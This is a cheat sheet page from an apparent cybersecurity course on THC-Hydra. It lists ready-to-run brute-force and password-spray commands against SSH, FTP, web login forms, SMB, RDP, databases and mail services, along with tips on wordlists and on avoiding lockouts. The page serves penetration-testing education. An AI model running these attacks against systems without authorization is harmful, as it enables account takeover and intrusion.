Cybersecurity Tools Cheat Sheets: Quick Reference Commands and Techniques

Hydra Cheat Sheet

38 enrolled
~185 min
02-01-2026
1 pt

Chapter Content

Deep dive into cybersecurity fundamentals

Hydra Cheat Sheet

Complete Password Brute Force Reference

50+ protocols • SSH, HTTP, FTP, RDP, databases and more

📅 Updated: December 2024⏱️ 20 min read🔧 Hydra 9.5+

📑 Quick Navigation

Basic Syntax SSH Attacks HTTP Forms FTP/SMB Databases RDP/VNC Performance Wordlists

What is Hydra?

THC-Hydra (commonly called Hydra) is a fast, parallelized login cracker that supports numerous protocols. Developed by The Hacker's Choice (THC), it's one of the most versatile password testing tools available, supporting over 50 different protocols including SSH, FTP, HTTP, HTTPS, SMB, databases, and many more.

Hydra is pre-installed on Kali Linux and other security-focused distributions. Source code is available on GitHub.

📦 Installation

Debian/Ubuntu/Kali

sudo apt install hydra

RHEL/CentOS/Fedora

sudo dnf install hydra

macOS (Homebrew)

brew install hydra

From Source

git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra && ./configure && make && sudo make install

🎯 Basic Syntax

hydra [options] <target> <protocol>
Flag Description Example
-l Single username -l admin
-L Username list file -L users.txt
-p Single password -p password123
-P Password list file -P rockyou.txt
-C Colon-separated user:pass file -C creds.txt
-s Port number -s 2222
-t Parallel tasks (threads) -t 16
-f Stop on first valid pair -f
-F Stop on first valid pair (all hosts) -F
-v / -V Verbose / show login attempts -V
-o Output file -o results.txt
-e nsr Try null/same/reversed passwords -e nsr
-M Target list file -M hosts.txt

📡 Supported Protocols

Run hydra -h to see all available protocols. Common ones include:

ssh ftp telnet http-get http-post-form https-get https-post-form smb rdp vnc mysql mssql postgres oracle mongodb ldap2 smtp pop3 imap snmp redis memcached

🔐 SSH Attacks

# Single username, password list
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<target>

# Username list, password list
hydra -L users.txt -P passwords.txt ssh://<target>

# Custom port
hydra -l admin -P passwords.txt -s 2222 ssh://<target>

# Try null, same as login, reversed
hydra -l root -P passwords.txt -e nsr ssh://<target>

# Verbose with 4 threads
hydra -l root -P passwords.txt -t 4 -V ssh://<target>

# Alternative syntax
hydra -l root -P passwords.txt <target> ssh

💡 Pro Tip

SSH typically has rate limiting. Use -t 4 (4 threads) to avoid triggering account lockouts and connection bans.

📁 FTP Attacks

# Basic FTP attack
hydra -l admin -P passwords.txt ftp://<target>

# Try anonymous login first
hydra -l anonymous -p anonymous ftp://<target>

# Multiple users with verbose output
hydra -L users.txt -P passwords.txt -V ftp://<target>

# Stop on first success
hydra -l ftpuser -P passwords.txt -f ftp://<target>

🌐 HTTP Form Attacks

HTTP form attacks require understanding the login form structure. You need: the form path, POST parameters, and a failure indicator.

Syntax

hydra -l <user> -P <wordlist> <target> http-post-form "/path:user=^USER^&pass=^PASS^:F=failure_string"
Placeholder Description
^USER^ Replaced with username
^PASS^ Replaced with password
F=string Failure condition (string present on failed login)
S=string Success condition (string present on successful login)

Examples

# Basic login form
hydra -l admin -P passwords.txt <target> http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"

# WordPress login
hydra -l admin -P passwords.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username"

# With cookies
hydra -l admin -P passwords.txt <target> http-post-form "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: PHPSESSID=abc123"

# HTTPS target
hydra -l admin -P passwords.txt <target> https-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# Using success condition instead
hydra -l admin -P passwords.txt <target> http-post-form "/login:user=^USER^&pass=^PASS^:S=Welcome"

⚠️ Finding Form Parameters

Use browser DevTools (Network tab) or Burp Suite to capture the actual POST request. Look for the form action URL and input field names.

🔒 HTTP Basic Authentication

# HTTP Basic Auth
hydra -l admin -P passwords.txt <target> http-get /admin/

# HTTPS Basic Auth
hydra -l admin -P passwords.txt <target> https-get /secure/

# With port specification
hydra -l admin -P passwords.txt -s 8080 <target> http-get /

💼 SMB/Windows Attacks

# SMB attack
hydra -l Administrator -P passwords.txt smb://<target>

# With domain
hydra -l DOMAIN\\Administrator -P passwords.txt smb://<target>

# RDP attack (slow, use few threads)
hydra -l administrator -P passwords.txt -t 1 rdp://<target>

# VNC (password only, no username)
hydra -P passwords.txt vnc://<target>

🗄️ Database Attacks

# MySQL
hydra -l root -P passwords.txt mysql://<target>

# PostgreSQL
hydra -l postgres -P passwords.txt postgres://<target>

# Microsoft SQL Server
hydra -l sa -P passwords.txt mssql://<target>

# Oracle SID required
hydra -l system -P passwords.txt oracle://<target>/XE

# MongoDB
hydra -l admin -P passwords.txt mongodb://<target>

# Redis (password only)
hydra -P passwords.txt redis://<target>

📧 Email Protocols

# SMTP
hydra -l user@domain.com -P passwords.txt smtp://<target>

# SMTP with TLS
hydra -l user@domain.com -P passwords.txt -S smtp://<target>:587

# POP3
hydra -l user -P passwords.txt pop3://<target>

# POP3S (SSL)
hydra -l user -P passwords.txt pop3s://<target>

# IMAP
hydra -l user -P passwords.txt imap://<target>

# IMAPS (SSL)
hydra -l user -P passwords.txt imaps://<target>

⚡ Performance Tuning

Flag Description Default
-t N Number of parallel tasks (threads) 16
-w N Wait time for responses (seconds) 32
-c TIME Wait time per connection attempt -
-W N Wait between reconnects 0
-T N Threads per target (when using -M) -

Recommended Thread Settings

SSH

4 threads

HTTP/HTTPS

16-32 threads

FTP

8-16 threads

RDP

1-4 threads

💾 Session Management

Hydra can save and restore sessions for long-running attacks:

# Sessions are auto-saved to ~/.hydra/hydra.restore

# Resume interrupted session
hydra -R

# Start attack with specific session file
hydra -l admin -P rockyou.txt ssh://<target> -I
-R Restore previous session
-I Ignore existing restore file (start fresh)

📚 Common Wordlists

On Kali Linux, wordlists are typically located in /usr/share/wordlists/

Wordlist Path Size
RockYou /usr/share/wordlists/rockyou.txt 14M passwords
SecLists Common /usr/share/seclists/Passwords/Common-Credentials/ Various
Top 10000 /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt 10K passwords
Default Creds /usr/share/seclists/Passwords/Default-Credentials/ Various

💡 Pro Tip

Start with smaller, targeted wordlists before using massive ones like rockyou.txt. Try common defaults first: admin:admin, root:root, user:password.

🔥 Common Attack Scenarios

# Quick default credential check
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<target>

# Multiple targets from file
hydra -L users.txt -P passwords.txt -M hosts.txt ssh

# Password spray (one password, many users)
hydra -L users.txt -p 'Summer2024!' smb://<target>

# Service on non-standard port
hydra -l admin -P passwords.txt -s 8022 ssh://<target>

# Output results to file
hydra -l root -P passwords.txt -o results.txt ssh://<target>

# Verbose with all attempts shown
hydra -l admin -P passwords.txt -V ssh://<target>

📚 Additional Resources

🔓 Hydra Cheat Sheet Complete!

You now have a comprehensive reference for the most versatile password brute-forcing tool. From SSH to web forms to databases, these commands cover the authentication attacks security professionals use every day.

SSH HTTP Forms FTP/SMB Databases RDP/VNC

Ready to crack your next authentication test!

Knowledge Validation

Demonstrate your understanding to earn points and progress

1
Chapter Question

What Hydra flag specifies the password list file to use?

1
Read
2
Validate
3
Complete

Ready to track your progress?

Create a free account to save your progress, earn points, and access 170+ hands-on cybersecurity labs.

Start Learning Free

Course Progress

Track your learning journey

0 /9
0 % Complete
9 Remaining
Course Chapters

No chapters found for this filter

Join 5,000+ hackers learning cybersecurity with hands-on labs. Create Account